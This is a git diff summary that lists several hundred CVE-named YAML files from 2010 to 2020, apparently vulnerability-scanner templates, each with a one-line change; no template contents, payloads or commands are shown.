http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 2 +- http/cves/2010/CVE-2010-1982.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 2 +- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 2 +- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 2 +- http/cves/2010/CVE-2010-4282.yaml | 2 +- http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2010/CVE-2010-5278.yaml | 2 +- http/cves/2010/CVE-2010-5286.yaml | 2 +- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 2 +- http/cves/2011/CVE-2011-4640.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 2 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5265.yaml | 2 +- http/cves/2012/CVE-2012-0392.yaml | 2 +- http/cves/2012/CVE-2012-0394.yaml | 2 +- http/cves/2012/CVE-2012-0896.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0981.yaml | 2 +- http/cves/2012/CVE-2012-0991.yaml | 2 +- http/cves/2012/CVE-2012-0996.yaml | 2 +- http/cves/2012/CVE-2012-1226.yaml | 2 +- http/cves/2012/CVE-2012-1823.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-2371.yaml | 2 +- http/cves/2012/CVE-2012-3153.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4878.yaml | 2 +- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4982.yaml | 2 +- http/cves/2012/CVE-2012-5321.yaml | 2 +- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2012/CVE-2012-6499.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2248.yaml | 2 +- http/cves/2013/CVE-2013-2251.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-5979.yaml | 2 +- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 2 +- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 2 +- http/cves/2014/CVE-2014-2323.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- http/cves/2014/CVE-2014-2908.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3120.yaml | 2 +- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4940.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 2 +- http/cves/2014/CVE-2014-6271.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 2 +- http/cves/2014/CVE-2014-8676.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 2 +- http/cves/2014/CVE-2014-9444.yaml | 2 +- http/cves/2014/CVE-2014-9606.yaml | 2 +- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 2 +- http/cves/2015/CVE-2015-1000005.yaml | 2 +- http/cves/2015/CVE-2015-1427.yaml | 2 +- http/cves/2015/CVE-2015-1503.yaml | 2 +- http/cves/2015/CVE-2015-1579.yaml | 2 +- http/cves/2015/CVE-2015-1635.yaml | 2 +- http/cves/2015/CVE-2015-1880.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2080.yaml | 2 +- http/cves/2015/CVE-2015-2166.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2807.yaml | 2 +- http/cves/2015/CVE-2015-2996.yaml | 2 +- http/cves/2015/CVE-2015-3035.yaml | 2 +- http/cves/2015/CVE-2015-3224.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 2 +- http/cves/2015/CVE-2015-4050.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4455.yaml | 2 +- http/cves/2015/CVE-2015-4632.yaml | 2 +- http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-4668.yaml | 2 +- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-5531.yaml | 2 +- http/cves/2015/CVE-2015-5688.yaml | 2 +- http/cves/2015/CVE-2015-7245.yaml | 2 +- http/cves/2015/CVE-2015-7297.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9312.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 2 +- http/cves/2015/CVE-2015-9480.yaml | 2 +- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 2 +- http/cves/2016/CVE-2016-1000133.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 2 +- http/cves/2016/CVE-2016-1000138.yaml | 2 +- http/cves/2016/CVE-2016-1000141.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 2 +- http/cves/2016/CVE-2016-10134.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 2 +- http/cves/2016/CVE-2016-10924.yaml | 2 +- http/cves/2016/CVE-2016-10956.yaml | 2 +- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3081.yaml | 2 +- http/cves/2016/CVE-2016-3088.yaml | 2 +- http/cves/2016/CVE-2016-3978.yaml | 2 +- http/cves/2016/CVE-2016-4975.yaml | 2 +- http/cves/2016/CVE-2016-5674.yaml | 2 +- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 2 +- http/cves/2016/CVE-2016-8527.yaml | 2 +- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000028.yaml | 2 +- http/cves/2017/CVE-2017-1000029.yaml | 2 +- http/cves/2017/CVE-2017-10075.yaml | 2 +- http/cves/2017/CVE-2017-10271.yaml | 2 +- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11512.yaml | 2 +- http/cves/2017/CVE-2017-11610.yaml | 2 +- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 2 +- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12611.yaml | 2 +- http/cves/2017/CVE-2017-12615.yaml | 2 +- http/cves/2017/CVE-2017-12617.yaml | 2 +- http/cves/2017/CVE-2017-12629.yaml | 2 +- http/cves/2017/CVE-2017-12635.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14186.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14535.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 2 +- http/cves/2017/CVE-2017-14849.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-15944.yaml | 2 +- http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 +- http/cves/2017/CVE-2017-17043.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 2 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2017/CVE-2017-17736.yaml | 2 +- http/cves/2017/CVE-2017-18024.yaml | 2 +- http/cves/2017/CVE-2017-18487.yaml | 2 +- http/cves/2017/CVE-2017-18490.yaml | 2 +- http/cves/2017/CVE-2017-18491.yaml | 2 +- http/cves/2017/CVE-2017-18492.yaml | 2 +- http/cves/2017/CVE-2017-18493.yaml | 2 +- http/cves/2017/CVE-2017-18494.yaml | 2 +- http/cves/2017/CVE-2017-18496.yaml | 2 +- http/cves/2017/CVE-2017-18500.yaml | 2 +- http/cves/2017/CVE-2017-18501.yaml | 2 +- http/cves/2017/CVE-2017-18502.yaml | 2 +- http/cves/2017/CVE-2017-18505.yaml | 2 +- http/cves/2017/CVE-2017-18516.yaml | 2 +- http/cves/2017/CVE-2017-18517.yaml | 2 +- http/cves/2017/CVE-2017-18518.yaml | 2 +- http/cves/2017/CVE-2017-18527.yaml | 2 +- http/cves/2017/CVE-2017-18528.yaml | 2 +- http/cves/2017/CVE-2017-18529.yaml | 2 +- http/cves/2017/CVE-2017-18530.yaml | 2 +- http/cves/2017/CVE-2017-18532.yaml | 2 +- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 2 +- http/cves/2017/CVE-2017-18542.yaml | 2 +- http/cves/2017/CVE-2017-18556.yaml | 2 +- http/cves/2017/CVE-2017-18557.yaml | 2 +- http/cves/2017/CVE-2017-18558.yaml | 2 +- http/cves/2017/CVE-2017-18562.yaml | 2 +- http/cves/2017/CVE-2017-18564.yaml | 2 +- http/cves/2017/CVE-2017-18565.yaml | 2 +- http/cves/2017/CVE-2017-18566.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 2 +- http/cves/2017/CVE-2017-5638.yaml | 2 +- http/cves/2017/CVE-2017-5689.yaml | 2 +- http/cves/2017/CVE-2017-6090.yaml | 2 +- http/cves/2017/CVE-2017-7269.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7615.yaml | 2 +- http/cves/2017/CVE-2017-7855.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 2 +- http/cves/2017/CVE-2017-8917.yaml | 2 +- http/cves/2017/CVE-2017-9140.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9791.yaml | 2 +- http/cves/2017/CVE-2017-9805.yaml | 2 +- http/cves/2017/CVE-2017-9822.yaml | 2 +- http/cves/2017/CVE-2017-9833.yaml | 2 +- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000226.yaml | 2 +- http/cves/2018/CVE-2018-1000533.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 2 +- http/cves/2018/CVE-2018-1000856.yaml | 2 +- http/cves/2018/CVE-2018-1000861.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 2 +- http/cves/2018/CVE-2018-10735.yaml | 2 +- http/cves/2018/CVE-2018-10736.yaml | 2 +- http/cves/2018/CVE-2018-10737.yaml | 2 +- http/cves/2018/CVE-2018-10738.yaml | 2 +- http/cves/2018/CVE-2018-10823.yaml | 2 +- http/cves/2018/CVE-2018-10942.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 2 +- http/cves/2018/CVE-2018-11227.yaml | 2 +- http/cves/2018/CVE-2018-11409.yaml | 2 +- http/cves/2018/CVE-2018-11473.yaml | 2 +- http/cves/2018/CVE-2018-11709.yaml | 2 +- http/cves/2018/CVE-2018-11759.yaml | 2 +- http/cves/2018/CVE-2018-11776.yaml | 2 +- http/cves/2018/CVE-2018-11784.yaml | 2 +- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12300.yaml | 2 +- http/cves/2018/CVE-2018-12613.yaml | 2 +- http/cves/2018/CVE-2018-12634.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 2 +- http/cves/2018/CVE-2018-13379.yaml | 2 +- http/cves/2018/CVE-2018-13380.yaml | 2 +- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 2 +- http/cves/2018/CVE-2018-14474.yaml | 2 +- http/cves/2018/CVE-2018-14574.yaml | 2 +- http/cves/2018/CVE-2018-14912.yaml | 2 +- http/cves/2018/CVE-2018-14916.yaml | 2 +- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15745.yaml | 2 +- http/cves/2018/CVE-2018-15917.yaml | 2 +- http/cves/2018/CVE-2018-15961.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16167.yaml | 2 +- http/cves/2018/CVE-2018-16283.yaml | 2 +- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 2 +- http/cves/2018/CVE-2018-16761.yaml | 2 +- http/cves/2018/CVE-2018-16763.yaml | 2 +- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 +- http/cves/2018/CVE-2018-17153.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2018/CVE-2018-17254.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 2 +- http/cves/2018/CVE-2018-18323.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18777.yaml | 2 +- http/cves/2018/CVE-2018-18778.yaml | 2 +- http/cves/2018/CVE-2018-18809.yaml | 2 +- http/cves/2018/CVE-2018-18925.yaml | 2 +- http/cves/2018/CVE-2018-19137.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 2 +- http/cves/2018/CVE-2018-19326.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19439.yaml | 2 +- http/cves/2018/CVE-2018-19458.yaml | 2 +- http/cves/2018/CVE-2018-19749.yaml | 2 +- http/cves/2018/CVE-2018-19752.yaml | 2 +- http/cves/2018/CVE-2018-19753.yaml | 2 +- http/cves/2018/CVE-2018-19914.yaml | 2 +- http/cves/2018/CVE-2018-19915.yaml | 2 +- http/cves/2018/CVE-2018-20009.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20526.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 2 +- http/cves/2018/CVE-2018-3167.yaml | 2 +- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5715.yaml | 2 +- http/cves/2018/CVE-2018-6008.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6910.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2018/CVE-2018-7467.yaml | 2 +- http/cves/2018/CVE-2018-7600.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 2 +- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7662.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-8006.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 2 +- http/cves/2018/CVE-2018-8715.yaml | 2 +- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8823.yaml | 2 +- http/cves/2018/CVE-2018-9118.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 2 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 2 +- http/cves/2019/CVE-2019-10068.yaml | 2 +- http/cves/2019/CVE-2019-10092.yaml | 2 +- http/cves/2019/CVE-2019-10098.yaml | 2 +- http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10475.yaml | 2 +- http/cves/2019/CVE-2019-10692.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-10758.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 2 +- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11510.yaml | 2 +- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 2 +- http/cves/2019/CVE-2019-12276.yaml | 2 +- http/cves/2019/CVE-2019-12314.yaml | 2 +- http/cves/2019/CVE-2019-12461.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12583.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12616.yaml | 2 +- http/cves/2019/CVE-2019-12725.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 2 +- http/cves/2019/CVE-2019-12985.yaml | 2 +- http/cves/2019/CVE-2019-12986.yaml | 2 +- http/cves/2019/CVE-2019-12987.yaml | 2 +- http/cves/2019/CVE-2019-12988.yaml | 2 +- http/cves/2019/CVE-2019-12990.yaml | 2 +- http/cves/2019/CVE-2019-13101.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 2 +- http/cves/2019/CVE-2019-13396.yaml | 2 +- http/cves/2019/CVE-2019-13462.yaml | 2 +- http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 2 +- http/cves/2019/CVE-2019-14251.yaml | 2 +- http/cves/2019/CVE-2019-14312.yaml | 2 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14530.yaml | 2 +- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 2 +- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15107.yaml | 2 +- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15642.yaml | 2 +- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 +- http/cves/2019/CVE-2019-15858.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 2 +- http/cves/2019/CVE-2019-16057.yaml | 2 +- http/cves/2019/CVE-2019-16097.yaml | 2 +- http/cves/2019/CVE-2019-16278.yaml | 2 +- http/cves/2019/CVE-2019-16469.yaml | 2 +- http/cves/2019/CVE-2019-16662.yaml | 2 +- http/cves/2019/CVE-2019-16759.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 2 +- http/cves/2019/CVE-2019-16997.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17444.yaml | 2 +- http/cves/2019/CVE-2019-17538.yaml | 2 +- http/cves/2019/CVE-2019-17558.yaml | 2 +- http/cves/2019/CVE-2019-17574.yaml | 2 +- http/cves/2019/CVE-2019-17662.yaml | 2 +- http/cves/2019/CVE-2019-1821.yaml | 2 +- http/cves/2019/CVE-2019-18371.yaml | 2 +- http/cves/2019/CVE-2019-18393.yaml | 2 +- http/cves/2019/CVE-2019-18394.yaml | 2 +- http/cves/2019/CVE-2019-1898.yaml | 2 +- http/cves/2019/CVE-2019-19368.yaml | 2 +- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 2 +- http/cves/2019/CVE-2019-20210.yaml | 2 +- http/cves/2019/CVE-2019-20224.yaml | 2 +- http/cves/2019/CVE-2019-20933.yaml | 2 +- http/cves/2019/CVE-2019-2616.yaml | 2 +- http/cves/2019/CVE-2019-2729.yaml | 2 +- http/cves/2019/CVE-2019-3398.yaml | 2 +- http/cves/2019/CVE-2019-3403.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 2 +- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-3929.yaml | 2 +- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5418.yaml | 2 +- http/cves/2019/CVE-2019-5434.yaml | 2 +- http/cves/2019/CVE-2019-6112.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 2 +- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6799.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7192.yaml | 2 +- http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7255.yaml | 2 +- http/cves/2019/CVE-2019-7256.yaml | 2 +- http/cves/2019/CVE-2019-7315.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 2 +- http/cves/2019/CVE-2019-8086.yaml | 2 +- http/cves/2019/CVE-2019-8390.yaml | 2 +- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-8982.yaml | 2 +- http/cves/2019/CVE-2019-9618.yaml | 2 +- http/cves/2019/CVE-2019-9632.yaml | 2 +- http/cves/2019/CVE-2019-9670.yaml | 2 +- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9922.yaml | 2 +- http/cves/2020/CVE-2020-0618.yaml | 2 +- http/cves/2020/CVE-2020-10199.yaml | 2 +- http/cves/2020/CVE-2020-10220.yaml | 2 +- http/cves/2020/CVE-2020-10546.yaml | 2 +- http/cves/2020/CVE-2020-10547.yaml | 2 +- http/cves/2020/CVE-2020-10548.yaml | 2 +- http/cves/2020/CVE-2020-10549.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 2 +- http/cves/2020/CVE-2020-10973.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 2 +- http/cves/2020/CVE-2020-11110.yaml | 2 +- http/cves/2020/CVE-2020-11450.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-11546.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2020/CVE-2020-11710.yaml | 2 +- http/cves/2020/CVE-2020-11738.yaml | 2 +- http/cves/2020/CVE-2020-11798.yaml | 2 +- http/cves/2020/CVE-2020-11853.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12116.yaml | 2 +- http/cves/2020/CVE-2020-12124.yaml | 2 +- http/cves/2020/CVE-2020-12127.yaml | 2 +- http/cves/2020/CVE-2020-12256.yaml | 2 +- http/cves/2020/CVE-2020-12259.yaml | 2 +- http/cves/2020/CVE-2020-12478.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 2 +- http/cves/2020/CVE-2020-13117.yaml | 2 +- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 +- http/cves/2020/CVE-2020-13167.yaml | 2 +- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 2 +- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13638.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13851.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 2 +- http/cves/2020/CVE-2020-14144.yaml | 2 +- http/cves/2020/CVE-2020-14179.yaml | 2 +- http/cves/2020/CVE-2020-14181.yaml | 2 +- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 2 +- http/cves/2020/CVE-2020-14882.yaml | 2 +- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15129.yaml | 2 +- http/cves/2020/CVE-2020-15148.yaml | 2 +- http/cves/2020/CVE-2020-15227.yaml | 2 +- 